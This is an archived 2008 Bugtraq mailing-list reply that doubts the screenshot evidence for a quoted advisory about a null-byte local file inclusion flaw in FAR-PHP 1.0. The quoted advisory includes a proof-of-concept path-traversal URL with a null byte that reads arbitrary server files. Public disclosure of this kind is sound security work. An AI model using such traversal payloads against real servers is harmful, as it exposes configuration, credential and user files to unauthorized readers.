lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 21 Aug 2008 21:46:53 -0400 From: William McAfee <sec-community@...goodhacker.com> To: beenudel1986@...il.com Cc: bugtraq@...urityfocus.com Subject: Re: Null Byte Local file Inclusion in FAR - PHP Project version:1.0 I'm sorry, but your screenshot actually leads me to not have much more confidence. I noticed your titlebar is modified, so that tells me the script is most likely modified in some way. Provide us with a pure script, please. Also, on an unrelated note, why are you running professional? Why did you blank out the bottom half of the window? What are you hiding? On Wed, 2008-08-20 at 20:56 -0600, beenudel1986@...il.com wrote: > ################################################################ > # .___ __ _______ .___ # > # __| _/____ _______| | __ ____ \ _ \ __| _/____ # > # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # > # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # > # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # > # \/ \/ \/ # > # ___________ ______ _ __ # > # _/ ___\_ __ \_/ __ \ \/ \/ / # > # \ \___| | \/\ ___/\ / # > # \___ >__| \___ >\/\_/ # > # est.2007 \/ \/ forum.darkc0de.com # > > ################################################################ > > # Web Application: FAR - PHP Project version:1.0 > # Vendor's Address :www.far-php.ro > ################################################################ > > > ################################################################ > Author: Beenu Arora > Address: www.beenuarora.com > ################################################################ > > > #Python Dark Scripts: www.beenuarora.com/work.html > > ################################################################ > #Date Found: 21/08/08 > #Severity: High > #Security Risk:Null Byte Files Retrieval > #Explaination:It is possible to view the contents of any file (e.g. databases, user information or configuration files) on the web server (under the permission restrictions of the web server user) > > > #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00 > #For the POC pic visit: www.beenuarora.com/POC.bmp > > ################################################################ > ______________________________________________________________________________________ > |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team memebers. | > |_____________________________________________________________________________________|
Powered by blists - more mailing lists